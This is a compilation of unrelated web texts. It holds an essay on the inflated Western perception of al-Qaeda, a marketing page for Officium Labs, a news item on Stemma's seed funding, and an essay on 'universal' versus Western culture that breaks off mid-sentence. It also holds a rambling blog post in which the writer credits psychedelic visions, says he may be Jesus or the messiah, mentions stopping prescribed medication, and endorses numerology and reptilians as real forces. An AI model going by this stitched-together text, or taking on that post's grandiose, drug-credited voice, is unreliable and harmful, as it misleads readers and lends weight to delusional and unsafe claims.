Why are we so apt to see the terrorist group or its offshoots where they don't really exist? Diners at a Kabul restaurant watch an Afghan newscast about Osama Bin Laden's death / Reuters In the first hours after a blast shook downtown Oslo on a Friday this July, a number of writers and bloggers in the U.S. -- including me -- seemed to converge around a common assumption. "It's natural to wonder whether al-Qaeda, the world's most famous terrorist organization, might have been involved," I wrote, repeating a conclusion many of us reached, it turned out prematurely and wrongly. The real culprit, a Norwegian man named Anders Behring Breivik, would appear to be the polar opposite of an al-Qaeda agent: ultranationalist, white supremacist, xenophobic, blonde-haired, and blue-eyed. But are the distinctions between a man like Breivik and a man, for they are always men, who calls himself a member of al-Qaeda really so clear and wide? I, like so many others, had clearly been mistaken to so readily assume al-Qaeda. But the error may have revealed less about media over-reaction than about another, much larger fallacy. The world's ever-widening definition of al-Qaeda, and our ever-rising expectations of their capabilities, have so exaggerated their strength and reach in our collective imaginations that we are ready to see them behind nearly every blast. MORE ON AL-QAEDA 10 YEARS LATER J.M. Berger: Anwar al-Awlaki and the Hijackers William McCants and William Rosenau: We've Won the War Daveed Gartenstein-Ross: Al-Qaeda Is Winning Thanassis Cambanis : We Still Don't Get the Threat of Non-State Actors In the decade since September 11, al-Qaeda has become physically isolated, less capable of striking its enemies, and largely shunned by the worldwide Islamic community it had wanted to lead. But it has succeeded enormously in persuading many in the West of much the opposite. Al-Qaeda wants us to see them everywhere, to imagine the group as a global movement with bloodthirsty agents in every corner, waiting for the order to strike. And we have often obliged, slapping al-Qaeda's label on just about every militant group or homicidal fanatic that happens to observe Islam, the world's second most common religion. How we got here reveals as much about our own propensity for over-reaction as it does about al-Qaeda's one remaining great skill: branding. The story of how al-Qaeda came to be is a famous one. A movement of Arab Islamists who went to fight in Afghanistan against the Russian army later turned their experience and their ideology, sharpened by the 1990 Gulf War, against the "apostate" regimes back home, particularly in Saudi Arabia and Egypt, and the Western nations supporting them. But what about the supposed al-Qaeda branch-offs that have displaced the original group (now largely contained in the Afghanistan-Pakistan border region) in ability to both kill and to terrify Westerners on al-Qaeda's behalf? Their stories are a little different -- and don't quite fit with what al-Qaeda would like you to believe. In 1991, Algeria held its first-ever real democratic elections. But when the Islamist party swept the first round of voting, Algeria's army staged a coup and cancelled the elections. Members and followers of the Islamist party took up arms against the new government, and soon some of the fighters formed what they called the Armed Islamic Group, an insurgency aimed at putting the democratically elected Islamists in power. In 1999, as it became clear the army would win the war, many members of the Armed Islamic Group accepted an offer of amnesty, laying down their arms. Some of the fighters refused, however, and declared a new name: the Salafist Group for Preaching and Combat. They kept fighting, though with less and less support from war-weary Algerians. Throughout the next decade, the increasingly marginalized SGPC slid into criminality, ransoming foreign tourists and terrorizing local villages. When the U.S-led coalition invaded Iraq in 2003, many of Algeria's angry young Islamist men -- the field of potential SGPC recruits -- rushed off to fight the American occupation. Suddenly bereft of new fighters and of donations (money had come mainly from Algerian exiles in France who were still furious at the military regime, but who now preferred to support the fighters in Iraq), the SGPC fell on hard times. Some officers deserted or accepted government amnesty offers. Then, in 2006, the group tried something that had worked for it before: rebranding. As it had in 1999, it changed its name. Or, more accurately, it adopted someone else's: al-Qaeda in the Islamic Maghreb. Al-Qaeda operational chief Ayman al-Zawahiri, always happy to take credit for someone else's fighting, claimed the Algerian movement as his own. In return, the SQPC could use al-Qaeda's cachet to improve their pitch to potential recruits and donors. But the 15-year-old group didn't appear to operate much differently now that it was a self-declared wing of al-Qaeda, and it didn't seem to pose much more of a threat to anyone, especially anyone outside of Algeria. But one thing did change: in 2007, Algeria got a big bump in foreign aid from the U.S., including $875,000 from the Pentagon alone. Such is the trend of al-Qaeda's supposed branches: local militant groups that have little interest in al-Qaeda's globally oriented ideology or mission nonetheless find it useful to claim they do. Often, whatever government is fighting that local group i finds it useful to claim an al-Qaeda connection, as Western governments tend to be willing to overlook abuses by and write lavish checks to a government that says it is at war with al-Qaeda. But no one seems to like this arrangement more than al-Qaeda itself, that handful of militants dodging drone strikes in the ungoverned backwaters of Yemen and Pakistan. Rather than fess up and admit defeat, al-Qaeda officers can claim virtually any Islamist militant group or gun-waving Muslim as part of their dark, global army. Because we so often believe them, al-Qaeda can accomplish the goal that once required committing successful acts of terrorism: terrorize Westerners. This history is now repeating itself in Nigeria. In 2002, militants in Nigeria's poorer, Muslim north formed a group they called Boko Haram to fight the police and government, which they resent as dominated by the wealthier, Christian south. They adopted acts of terrorism to further their cause. Sure enough, this August, reports began appearing about possible "links" to al-Qaeda. But phrases like "al-Qaeda affiliated" and "al-Qaeda linked" can mean much less than they might sound like they mean. The case for Boko Haram's "links" appears slim: members took trips to meet and train with al-Qaeda "affiliates," later adopting what looks like a version of their bombing technique. That "affiliate," however, was none other than al-Qaeda in the Islamic Maghreb, the Algerian group. Al-Qaeda is surprisingly successful at selling its logic, in which the most tenuous financial, ideological, or even personal connection is used as evidence of their control over another group or individual. (Their evidence that U.S. Army Major Nidal Hasan was working for al-Qaeda when he descended into psychopathy and shot several fellow soldiers? He had exchanged some apparently mundane emails with Anwar al-Awlaki.) But does that logic really hold? An anti-government insurgent in a Muslim-majority country might be considered an "al-Qaeda affiliated" in the same way that, for example, a low-level officer in the Pakistani army could be called "U.S. affiliated." The officer's organization gets some funding from the U.S., the Pakistani officer and the U.S. share a few common enemies and common allies, he may have received some training at some point from an American, and the officer's bosses are likely to maintain diplomatic links to the U.S. government. But we don't consider every rank-and-file Pakistani army officer an American agent, or assume his every action comes at the behest of top-level American leadership. Only when it comes to Islamist terrorist groups do we draw such conclusions. Still, it's not hard to see how we keep making the mistake of over-estimating al-Qaeda. Violent conflict is, for reasons having to do with the end of colonialism and the proxy conflicts of the Cold War, disproportionately common in countries with a significant Muslim populations. Al-Qaeda's ideology, designed during the Afghan war against Soviet occupation, claims common cause with every armed Islamic group, of which there are a few. And large-scale terrorist attacks against civilians, though pioneered during the Latin American conflicts of the 1980s, have been seared into the American imagination as a tool of al-Qaeda by the attacks of September 11, leading us to believe al-Qaeda when they tell us that every group that builds bombs and observes Islam must be part of the same monolithic force. But the great al-Qaeda menace is not what they would have us believe. Look at the data: the wave of terrorist attacks against the West, which September 11 was supposed to inspire, never came: not from the real al-Qaeda, which paid dearly for their attack, and not from the so-called "franchises" that show little real interest in following al-Qaeda's suicidal mission. The two exceptions are in Yemen, where the al-Qaeda off-shoot does want to mimic Osama bin Laden's jihad but has so far succeeded mostly in achieving his group's extreme isolation; and in Iraq. There, following the U.S.-led invasion, al-Qaeda-appointed officers were able to recruit as many as a few thousand fighters from the Middle East and North Africa to turn Iraq into a terrorist's playground. But it's worth considering that al-Qaeda would not have been able to do this without the 2003 invasion that threw Iraq into chaos in the first place. That was itself was inspired by American overreaction to al-Qaeda. At the time, 70 percent of Americans believed Saddam Hussein had been personally involved in the September 11 attacks; 80 percent believed he had ties to al-Qaeda. But who doesn't?
1
'meaning' v0.01 – or, why I, the agnostic rationalist think I'm maybe Jesus?
first things first: nullius in verba. take no one’s word for anything. you should only accept the ideas i advance if they are the best explanations you have heard… Welcome to the edge of my mind, a vast network of neurons stubbornly unwilling to sync its premises with the group, because i’ve been shown truth, meaning, and various weird inexplicable things by the all powerful mushroom gods… so now either i’m right and you all have to sync with me, or i’m not, and i seriously should slow down on drugs and probably get a job on team powerpoint & boring meetings… this is my last shot, my moonshot… cause maybe, just maybe i am standing on the peak of current knowledge, surrounded by babbling babies trying to throw their perscription loops at me. but i think i escaped… i’ve reached escaped velocity on personal knowledge… and it’s… absolutely crazy to everyone around me, and absolutely fucking trippy to me too… as a narrow, risky prediction, that should instantly interest smart people everywhere: i’m pretty sure i can now, with the right mental representations of consciousness, and 10 years of deliberate practice… may be able to turn off my default mode network somewhat at will, as evidenced by my eyes going in and out of the wide-eyed trippy crazy thing… throughout the day… which i achieved via… lots of entheogens, mainly, plus limit experiences, and an extremely robust verbal baby brain that likes to explain shit… and a lot of longer meditations inspired by naval and kapil… almost like my reducing valve has been solved, and my brain is suddenly doing a lot more, because i solved the source code of the prescription brain…. inevitably the mind needs a meta-framework by which to program itself, and i think the key principle that got me into personal knowledge escape velocity (aka ‘craziness’, or ‘petulant unwillingness to sync back to the ~7 billion clever selfish verbally advanced baby brains who comprising the herd referred to as ‘society’)… is that the mind may only use force to align other fundamental forces into positive sum / pareto optimal arrangements… oh, and i went from 100% woo woo stuff does not ‘make sense’ about 4 weeks ago, to… as i mentioned… thinking i’m god? so it’s been a bit of a ride over here… and similarly, i’m pretty sure all the ‘crazy’ people were onto something… my hunch is that the following are all fundamental forces yet to be fully understood: stars / horoscopes, volcanoes / reptilians, death / ghosts, ufos / aliens, numbers / numerology. i drafted this post in the womb, but have spent the last rest of my life fine-tuning the the punctuation and prose to make sure it doesn’t seem like a patchy drug rant inspired largely by visions the sneaky mushroom gods showed me 5 days ago, on ‘labor day’ as the power point army calls it, or ‘rosh hashanah’ as my Jewish friends call it… but anyways, full disclosure… i did in fact, a few times before, ‘do the drugs’ as they put it these days, and… everything they said about the slippery slope is true. once you ‘do the drugs’ once… you have fun and, for some reason, after the fun… you want to do the fun thing more… because it’s fun. that’s why. because of the fun you have… though be warned, when the mind confuses wants with feels, you’ll quickly become addicted to your wants… but anyways, i know that a lot of the prescription lizards out there follow the very, very, very simple mental model that ‘drugs are bad, mmmmkay’, and the very, very, simple implication that ‘people who do the drugs are bad’… well yeah… for you all out there… i ‘do the drugs’ and i am therefore ‘bad’. so proceed with my madness accordingly… …oh, but also… heads up to those same people… just to jam you lizard brain into perscription loop mania — i am currently fully sober — water + crackers + sleep. no sugar, no coffee, no booze (e.g. yes you’re on way more drugs than me, right now)… …and also, i’m in excellent shape (his still sometimes grippy ego said somewhat over-confidently, ‘decent shape’ might be more… ‘accurate’)… but to be more objective: my resting heart rate is ~40bpm, my sleepwatch app says i sleep pretty good, i can run a mile in… umm… i haven’t actually ran one in a while, but i’d say, overconfidently, ~6 minutes… … and, no worries, you fragile worry minds out there… we are already full steam ahead looping through the two go-to prescriptions for this situation, ‘call cops’ and ‘send to hospital’…) when someone is ‘crazy’, e.g. ‘unwilling to concede to the herd, unless someone in the herd can explain the herds argument’… …so yeah, to help make sure this isn’t ‘mania’ for them… i’m even taking a break from the psychiatrist-grade meth aka adderall my quack gives for my me ‘attention deficit disorder’, which i used to misdiagnose as my hatred for doing boring trivial meaningless things, before realizing that was actually my mental illness, and healthy people actually really enjoy that type of stuff… … so anyways, here we are. i am the stubborn roam graph unwilling to sync to the world. so here we go world. me v you… … and, heads up, i’m going to win. you all are going to join me… … cause i found the rational meme that turns finite into infinite games, and infinite games into finite ones… i’m either on the peak of the mountain of knowledge, or insanity. i feel deserving of either a modest substack to support my consciousness spelunking and subsequent drug rambles… or, if i’m onto something clever, like the other genius babies wielding the leverage of the world… then, i’d like to offer my candidacy to be your meme lord / philosopher king… basically like the joker… but good... chaotic good. i hope this little idea, this crystalline structure of semantic symbols, this unique snowflake… can replicate in your mind, and the minds around you… to grow into the avalanche that (lovingly) sweeps the world… oh god, here we are, at the peak of a mountain, crazy, or genius, full. send. ❄️ ❄️❄️ ❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ps — my next task is to further verify, to myself, that i am… umm… 'jesus’ or the ‘messiah’, or whatever. basically god (which feels like a very smart whisper in my mind… seriously)… is telling me to translate the meme that can change the world that… umm… yeah ‘love is the answer’. if you think you can help me with that, please dm me on twitter @chilipixels, or email me… also, i think a call with kapil, naval, and balaji would be validating… so dear internet mob, please help me get their attention… without being a total dick about, so that they don’t hate me if we end up talking. but a wee bit of pestering is permitted… according to me, at least… just until the snowball is rolling…
1
Officium Labs – We help brands deliver customer experiences
We help brands deliver incredible customer experiences. Service is at the core of our DNA. It brings us great joy to help organizations connect with their customers in amazing new ways. Our global team of thought leaders is transforming the work of experience design—shifting customer service from a cost center to a profit center. h2 “We used Officium Labs to help us set our structure last year. They came in and created this amazing, fun CX audit to understand the capabilities that we had as a CX organization and gave us a roadmap to help us create the right strategies to move forward in delivering amazing experiences for our customers.” Brett Frazer VP Customer Service at Sun Basket We provide the best-in-class people, products, and practices that deliver great customer experiences. Use our custom CX solutions to help create, transform and grow your Customer Service organization. Connect is the frontline worker hub in the network. Clients get to tap into the power of our frontline CS global network through a flexible on-demand model, to deliver incredible experiences to their customers Transform is the consulting hub in the network. Our CX professionals, work with existing and potential clients to create best-in-class CX solutions through a consultative approach using our trademarked Service Stack methodology Innovation is the technology hub in the network. We provide SaaS technology solutions that help clients optimize their business and deliver long term customer value According to a recent estimate, poor customer service is costing companies in the U.S. $75 billion a year, $339 billion globally. Why are companies losing out on so much revenue opportunity? How do we solve the problem and help companies reach their full revenue potential?
2
Stemma (makers of Amundsen) launches with $4.8M to build managed data catalogue
As companies increasingly rely on data to run their businesses, having accurate sources of data becomes paramount. Stemma, a new early-stage startup, has come up with a solution, a managed data catalogue that acts as an organization’s source of truth. Today the company announced a $4.8 million seed investment led by Sequoia with assorted individual tech luminaries also participating. The product is also available for the first time today. Company co-founder and CEO Mark Grover says the product is actually built on top of the open-source Amundsen data catalogue project that he helped launch at Lyft to manage its massive data requirements. The problem was that with so much data, employees had to kludge together systems to confirm the data validity. Ultimately manual processes like asking someone in Slack or even creating a Wiki failed under the weight of trying to keep up with the volume and velocity. “I saw this problem firsthand at Lyft, which led me to create the open-source Amundsen project with a team of talented engineers,” Grover said. That project has 750 users at Lyft using it every week. Since it was open-sourced, 35 companies like Brex, Snap and Asana have been using it. Toro snags $4M seed investment to monitor data quality What Stemma offers is a managed version of Amundsen that adds functionality like using intelligence to show data that’s meaningful to the person who is searching in the catalogue. It also can add metadata automatically to data as it’s added to the catalogue, creating documentation about the data on the fly, among other features. The company launched last fall when Grover and co-founder and CTO Dorian Johnson decided to join forces and create a commercial product on top of Amundsen. Grover points out that Lyft was supportive of the move. Today the company has five employees, in addition to the founders, and has plans to add several more this year. As he does that, he is cognizant of diversity and inclusion in the hiring process. “I think it’s super important that we continue to invest in diversity, and the two ways that I think are the most meaningful for us right now is to have early employees that are from diverse groups, and that is the case within the first five,” he said. Beyond that, he says that as the company grows he wants to improve the ratio, while also looking at diversity in investors, board members and executives. The company, which launched during COVID, is entirely remote right now and plans to remain that way for at least the short term. As the company grows, they will look at ways to build camaraderie, like organizing a regular cadence of employee offsite events. How to ensure data quality in the era of Big Data
1
How's it going with the Universal Cultural Takeover?
Warning: this is a long post, split over two parts. Part II is coming soon. David Reinstein points me at a 2016 exchange between Bryan Caplan and Scott Alexander over a fine point of nomenclature: is the culture that is taking over the world “Western” or “universal”? Here’s Scott Alexander’s key point: I worry that Caplan is eliding the important summoner/demon distinction. This is an easy distinction to miss, since demons often kill their summoners and wear their skin. But in this case, he’s become hopelessly confused without it. I am pretty sure there was, at one point, such a thing as Western civilization. I think it included things like dancing around maypoles and copying Latin manuscripts. At some point Thor might have been involved. That civilization is dead. It summoned an alien entity from beyond the void which devoured its summoner and is proceeding to eat the rest of the world. I love Scott Alexander’s writing. His post is thought-provoking, sharp and completely wrong-headed. In fact, I’ll put both articles forward as 21st-century versions of The End of History or Norman Angell’s Great Illusion : confident predictions which turned out wildly mistaken. On the Today Programme , the general defending Lakshargah is calm. “The Taliban are unable to take this city given the number of casualties that they have sustained…. Last week, the Taliban casualty rate in Helmand was 70, our casualty rate was 1”. He calls the presenter “Martha” in clipped Transatlantic. I get an uncomfortable feeling: there are two ways to look at that statistic. Are the Taliban losing? Or are they just more willing to take casualties? Next up is a former interpreter for the Brits with a different perspective. Thick Afghan accent. “The city is almost 95% fallen into the Taliban hands… There is dead bodies in every street…. I’ve changed places three times…. My own house which I left yesterday, it has been captured by Taliban, and they are living there, and they were asking for me.” Or is it universal culture, as Alexander says? But we can skip this question, because Coke isn’t culture. As a concept, “culture” is notoriously slippery and expansive. Biologists have the best definition: behaviours that are not built-in, but learned from conspecifics. That’s big and broad, but it still has cutting power. So, Coke isn’t culture: it’s a brown fizzy drink in cans. “Liking sweet stuff” also isn’t culture: it’s natural, everyone does it, no learning required. Many things round Coke might be culture: the recipe for Coke, advertisements for Coke, showing off by drinking Coke, using Coke as a metonym for Western civilization. Those are all cultural, but they’re also unimportant. The argument “Western civilization conquers all” gains strength if Western civilization is put in a big basket including all the products made by Western firms. But as Samuel Huntington pointed out long ago: The essence of Western civilization is the Magna Carta, not the Magna Mac. The fact that non-Westerners may bite into the latter has no implications for their accepting the former…. Somewhere in the Middle East a half-dozen young men could well be dressed in jeans, listening to rap, and, between their bows to Mecca, putting together a bomb to blow up an American airliner. Culture survives by reproducing itself. Ultimately it can only do this by aiding its bearers in reproducing them selves. The Shakers , who condemned all sexual relations as sinful, made beautiful furniture, but as Wikipedia puts it, “many… Shaker settlements are now museums”. Western or universal culture is not doing that. The headline measures are plain enough: total fertility rates of 1.8 for the US, 1.59 for Western Europe, 1.3 ish in the Mediterrean countries. This is not only “Western”, for sure: 1.26 for Singapore, 1.33 for Japan, 1.24 for South Korea. These headline numbers underestimate the problem. The prime way in which modern countries inculcate their cultures is through their formal education systems. And it is precisely the most educated who have the fewest children. I’m going to a Christening tomorrow with the old gang from university. We’re middle-aged now. I can just count up: That is still not the whole story. Of those 11 children, 5 come from Jewish families — a culture of which parts have resolutely refused to be eaten by the demon. In Isaac Bashevis Singer’s The Penitent , a disillusioned New York businessman turns away from secular culture to the faith of his fathers: Up to that day I had been a reader of books, magazines, and newspapers. I had often felt that what I was reading was a deadly poison…. Everything that I read followed the same theme—the world was and will always be ruled by might and falsehood, and there was nothing to be done about it…. Suddenly I heard myself reciting words filled with holy optimism. Instead of starting the day with tales of theft and murder, lust and rape, obscenity and revenge, I had started the day with words about justice, sanctity, a God who had granted men understanding and who will revive the dead and reward the just. I had discovered that I didn’t have to start the day by swallowing venom. Given a choice, young people choose Western consumerism, gender norms, and entertainment. Anti-Western governments from Beijing to Tehran know this this to be true: Without draconian censorship and social regulation, “Westoxification” will win. How’s that story working out in Tel Aviv? Ultra-Orthodox Judaism is not a one-off. As Eric Kaufmann points out in Shall the Religious Inherit the Earth? r eligious cultures which haven’t been “eaten by the demon” are doing fine. In all parts of the world, fundamentalist fertility exceeds moderate religious fertility, which in turn outpaces secular fertility. Sometimes explicitly, self-consciously so. Some of the most extreme fundamentalist groups eschew conversion in favour of reproduction. They have quit persuading people on to their ark, and are getting ready to float. probably the most subversive and effective strategy we might undertake would be one of militant fecundity: abundant, relentless, exuberant, and defiant child-bearing. Maybe universal culture can win by spreading, faster than “uneaten” cultures can win by reproducing? (Cultural evolutionary theory calls this horizontal transmission.) No way. First, for the simple mechanical reason that if universal culture brings up fewer children, then there are fewer sources for it to spread from. …evolutionary theorists brought up far more scientific arguments – but committed believers in supernatural agents brought up far more children. Second, because shrinking groups lose prestige. Some ideas spread because they are better (Scotch whisky has gone round the globe, haggis has not) but many ideas spread by association with success (businessmen round the world wear ties, so as to look like rich people). Western ideas spread widely in the twentieth century. Ataturk Because they were obviously better, or because the West was winning? Erdogan Let’s survey how some important Western ideas are doing. LGBTQetc . For a movement that started by fighting criminalization, the widespread acceptance of gay marriage is an extraordinary achievement. But it’s widespread, not universal. In fact, it’s widespread in the West, not really anywhere else, in particular not in the Asian countries where most humans live. Gay marriage around the world. Source: Wikipedia. Gay marriage might be a high point, because where else is there to go? Apparently into increasingly controversial and sometimes ridiculous arguments. Even in 2016 Scott Alexander’s post gave transgender toilets as an example of a non-issue. My university’s Vice-Chancellor, whose name I don’t presently recall, now signs off his emails “Pronouns: he/him”. Do you think he still will in ten years’ time? Five? Two? The traditional logic of activism is “first they laugh at you, then they fight you, then you win”. Someone seems to have put this sequence in reverse. You could interpret this shift as a sign of success: movements that have managed to push society in one direction keep pushing, even if they maybe sometimes push too far. There is also a more pessimistic interpretation. When the Second Coming failed to arrive on October 22, 1844 , the expectant Millerites did not fall apart. Instead, many of them doubled down; from this group came both the Jehovah’s Witnesses and the Seventh Day Adventists. Extremism can result from success, but it can also feed on itself, as moderates are put off and peel away. Feminism . Feminism is probably the West’s most powerful and successful idea of the past century. But there is no guarantee that the end state of the feminist wave will be the same in all countries. And even within the Western “homelands”, those religious groups that have most children are also often the least feminist. By the way, when China rolled out the red carpet for a delegation from the Taliban , part of their offer was: no hassle about gender relations. Democracy has been in retreat for a decade. Part of that is geopolitical , as countries slip back from the “grey area” towards full-blown authoritarian rule. Another part is ideological. Democracy is viewed with increasing skepticism by intellectual elites. Two themes now run in parallel through our political science literature: democracy is in danger ( How Democracies Die , How Democracy Ends , On Tyranny , Twilight of Democracy ) and democracy ain’t that great ( Against Democracy , 10% Less Democracy , Democracy for Realists ). While most Westerners retain a nominal commitment to democracy, they also treat actual politicians and electoral campaigns with derision. Isn’t that what a crumbling ideal looks like? My mother, in Peshawar on 9/11, was made to come home by her family, much against her will. Later a friend’s daughter came over from Pakistan to study in Liverpool. First contact with Scousers brought shock. “They have no values!” she told us. “No culture!” Of course, we disagreed. The threat Islam poses to Western/“universal” culture isn’t from suicide-bombing loons and Inspire magazine. Those are just, if you like, an exuberant side-effect. The threat is the prosperous Islamic — or Mormon or Orthodox — family, which sends its daughters to medical school, buys a widescreen TV for the living room, and has absolutely no intention of “Westernizing”, any more than 19th-century Victorians would have “Turkified”. Why embrace failure? Objects in the rear view mirror may seem farther away than they really are. As history moves forward, the picture below stops looking like “a meeting between modern and primitive peoples” and starts looking like “a meeting between two primitive peoples”. Look at the funny costumes and the strange headdresses! Gertrude Bell with Ibn Saud From that it is an easy step to putting everything before [your birth year minus 20] into the same basket: traditional cultures threatened by universal culture. Scott Alexander: … the model of “every culture is being universalized” finds Western culture to be as much a victim as anywhere else. Coca-Cola might have replaced traditional yak’s milk in Mongolia, but it also replaced traditional apple cider in America. A Hopi Indian saddened that her children no longer know the old ritual dances differs little from a Southern Baptist incensed that her kids no longer go to church. Universal values have triumphed over both. Not all these things are the same! In particular, “traditional Western” culture is not just the site where universal culture happened to turn up, it was part of the process that brought it into being. Scientific advances have been made several times in history, but sustained scientific progress was never made until the sixteenth century. Stephen Gaukroger, who clearly knows more about the history of science than anyone else, thinks that science (“natural philosophy”) was sustained by its role in supporting Christian theology. Jürgen Habermas thought that the modern public sphere, where democratic policy ideas are debated, was born in the 18th century coffee house. Nope, it was a century earlier, during religious arguments between Puritans and others, and David Zaret will tell you about it . And there’s Joel Mokyr’s arguments about the cultural origins of modern economic growth . This is about more than bragging rights. Capitalism and modernity don’t just turn up (they didn’t turn up for the previous six thousand years of civilization). They needed conditions for their creation. Now it is certainly possible that, as Alexander says, “Universal culture is high-entropy; it’s already in its ground state and will survive and spread without help”, or, to mix scientific metaphors, that modern economic growth has gone exothermic and needs no further cultural inputs. But an alternative view is the Daniel Bell one, that capitalism requires non-capitalistic support — that being a consumer of capitalist goods might ultimately make it harder to be a producer of those goods. Drinking Coca-Cola is natural! Bottling Coca-Cola may not be. If you put all traditional cultures into one box, and modern universal culture into another, then you will worry about the threat to traditional cultures, from a kind of anthropologist’s/zookeeper’s point of view… I’m just happy that [Western culture] exists in the same way I’m happy that pandas and gorillas exist, a basic delight in the diversity of the world. … and you will include traditional Western culture in that, and these ideas may get mixed up with contemporary concerns with the Left Behind and Elegies to Hillbillies: … opponents of colonialism tend to believe that cultures are valuable and need to be protected in and of themselves. This is true even if the culture is very poor, if the culture consists of people who aren’t very well-educated by Western standards, even if they believe in religions that we think are stupid, even if those cultures have unsavory histories, et cetera. We tend to allow such cultures to resist outside influences, and we even celebrate such resistance…. We celebrate when cultures choose preservation of their traditional lifestyles over mere economic growth, like Bhutan’s gross national happiness program. This is true in every case except with the cultures we consider our outgroups – in the US, white 